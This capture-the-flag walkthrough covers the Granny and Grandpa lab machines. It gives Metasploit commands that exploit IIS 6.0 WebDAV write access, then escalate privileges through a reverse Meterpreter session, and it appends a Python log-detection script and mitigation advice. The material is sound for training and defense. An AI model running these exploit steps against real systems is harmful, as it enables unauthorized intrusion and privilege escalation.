Granny and Grandpa
These two machines can be solved with the same procedure (they are insanely similar), so I will walk you through Granny. It is a Windows machine and its level is Easy. Its IP is 10.10.10.15.
- Start with the port scan, identify the server version and enumerate it thoroughly (it's the gateway).
- Once you get a session, use the suggester in msfconsole.
Let's start with the usual port scan.
It's obvious that it is running a web app that is still under construction. Searching for the server banner (Microsoft IIS 6.0) shows that Metasploit itself has an exploit for it: Microsoft IIS WebDAV Write Access Code Execution. So open msfconsole:
msf exploit(windows/iis/iis_webdav_upload_asp) > set rhost 10.10.10.15
msf exploit(windows/iis/iis_webdav_upload_asp) > run
After that a shell opens, but with very limited access.
Always remember: when you have a Meterpreter session and need to escalate privileges, run post/multi/recon/local_exploit_suggester, which gives you a list of exploits that can be used in this session.
This time, use the pprFlattenRec Local Privilege Escalation module to get access again, but as a privileged user.
msf exploit(windows/local/ppr_flatten_rec) > set session 1
msf exploit(windows/local/ppr_flatten_rec) > set wait 20
msf exploit(windows/local/ppr_flatten_rec) > set lhost YOUR_IP
msf exploit(windows/local/ppr_flatten_rec) > exploit
BOOM!!! A Meterpreter session with escalated privileges is open. If not, try to migrate the process in the first session. Then look for user.txt and root.txt: go to the Documents and Settings folder, where you will find the users Lakis (the user is harry in Grandpa) and Administrator, which hold user.txt and root.txt.
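From the defender's side, the WebDAV write-access step above shows up in the IIS W3C log, and the sketch below flags it. It is an added example, not part of the original write-up: the log lines are constructed, and it assumes the c-ip, cs-method, cs-uri-stem and sc-status fields are being logged.

```python
"""Flag WebDAV write activity in an IIS W3C extended log (added example)."""
from collections import defaultdict

WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "PROPPATCH", "DELETE"}
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".cer")

# Constructed sample log, not taken from the machine in the write-up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 GET /index.html 200
2024-01-01 10:00:05 192.0.2.50 OPTIONS / 200
2024-01-01 10:00:07 192.0.2.50 PUT /upload_test.txt 201
2024-01-01 10:00:08 192.0.2.50 MOVE /upload_test.txt 201
2024-01-01 10:00:09 192.0.2.50 GET /upload_test.asp 200
2024-01-01 10:00:11 192.0.2.10 PUT /notes.txt 403
"""

def parse_w3c(text):
    """Yield one dict per request, named by the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_webdav_writes(text):
    """Return {client_ip: [findings]}: successful writes, then script requests."""
    findings = defaultdict(list)
    writers = set()  # clients that already completed a WebDAV write
    for rec in parse_w3c(text):
        ip, method = rec["c-ip"], rec["cs-method"].upper()
        path = rec["cs-uri-stem"]
        if not rec["sc-status"].startswith("2"):
            continue  # rejected requests changed nothing on disk
        if method in WRITE_METHODS:
            writers.add(ip)
            findings[ip].append(f"write {method} {path}")
        elif ip in writers and path.lower().endswith(SCRIPT_EXTS):
            findings[ip].append(f"script-after-write {method} {path}")
    return dict(findings)

if __name__ == "__main__":
    for ip, items in find_webdav_writes(SAMPLE_LOG).items():
        print(ip, items)
```

Disabling the WebDAV extension, or removing write permission on the web root, closes the exposure; the script only tells you whether it has already been used.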